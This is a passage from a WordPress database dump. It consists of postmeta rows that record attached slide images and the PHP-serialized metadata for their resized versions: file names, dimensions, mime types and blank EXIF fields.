s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slide91-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"slide91-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"slide91-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:20:\"slide91-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"slide91-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"slide91-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"slide91-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"slide91-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"slide91-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"slide91-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(212,551,'_wp_attached_file','2014/07/slide101.jpg'),(213,551,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:20:\"2014/07/slide101.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"slide101-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"slide101-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"slide101-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"slide101-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"slide101-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"slide101-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:21:\"slide101-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:21:\"slide101-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:20:\"slide101-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:20:\"slide101-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:20:\"slide101-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:20:\"slide101-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:20:\"slide101-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(214,552,'_wp_attached_file','2014/07/slide111.jpg'),(215,552,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:20:\"2014/07/slide111.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"slide111-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"slide111-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"slide111-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"slide111-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"slide111-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"slide111-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:21:\"slide111-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:21:\"slide111-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:20:\"slide111-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:20:\"slide111-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:20:\"slide111-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:20:\"slide111-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:20:\"slide111-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(216,553,'_wp_attached_file','2014/07/slide121.jpg'),(217,553,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1171;s:4:\"file\";s:20:\"2014/07/slide121.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"slide121-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"slide121-1024x625.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:625;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"slide121-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"slide121-768x468.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"slide121-1536x937.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:937;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"slide121-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"slide121-1670x1019.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1019;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:21:\"slide121-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:20:\"slide121-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:20:\"slide121-880x537.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:20:\"slide121-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:20:\"slide121-450x274.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:20:\"slide121-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(218,554,'_wp_attached_file','2014/07/0111.jpg'),(219,554,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:500;s:4:\"file\";s:16:\"2014/07/0111.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"0111-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"0111-1024x438.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"0111-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"0111-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"0111-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:16:\"0111-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:16:\"0111-880x376.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:16:\"0111-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:16:\"0111-450x192.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:16:\"0111-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(220,555,'_wp_attached_file','2014/07/0211.jpg'),(221,555,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:500;s:4:\"file\";s:16:\"2014/07/0211.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"0211-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"0211-1024x438.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"0211-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"0211-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"0211-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:16:\"0211-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:16:\"0211-880x376.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:16:\"0211-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:16:\"0211-450x192.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:16:\"0211-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(222,556,'_wp_attached_file','2014/07/0311.jpg'),(223,556,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:500;s:4:\"file\";s:16:\"2014/07/0311.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"0311-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"0311-1024x438.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"0311-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"0311-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"0311-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:16:\"0311-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:16:\"0311-880x376.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:16:\"0311-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:16:\"0311-450x192.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:16:\"0311-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(224,557,'_wp_attached_file','2014/07/0411.jpg'),(225,557,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:500;s:4:\"file\";s:16:\"2014/07/0411.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"0411-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"0411-1024x438.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"0411-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"0411-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"0411-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:16:\"0411-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:16:\"0411-880x376.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:16:\"0411-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:16:\"0411-450x192.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:16:\"0411-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(226,558,'_wp_attached_file','2014/07/b-slide11.jpg'),(227,558,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1048;s:4:\"file\";s:21:\"2014/07/b-slide11.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"b-slide11-300x164.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"b-slide11-1024x559.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"b-slide11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"b-slide11-768x419.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:419;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"b-slide11-1536x838.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:838;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"b-slide11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"b-slide11-1670x912.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:912;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"b-slide11-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"b-slide11-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"b-slide11-880x480.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"b-slide11-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"b-slide11-450x246.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"b-slide11-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(228,559,'_wp_attached_file','2014/07/b-slide21.jpg'),(229,559,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1048;s:4:\"file\";s:21:\"2014/07/b-slide21.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"b-slide21-300x164.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"b-slide21-1024x559.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"b-slide21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"b-slide21-768x419.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:419;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"b-slide21-1536x838.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:838;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"b-slide21-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"b-slide21-1670x912.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:912;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"b-slide21-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"b-slide21-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"b-slide21-880x480.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"b-slide21-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"b-slide21-450x246.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"b-slide21-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"c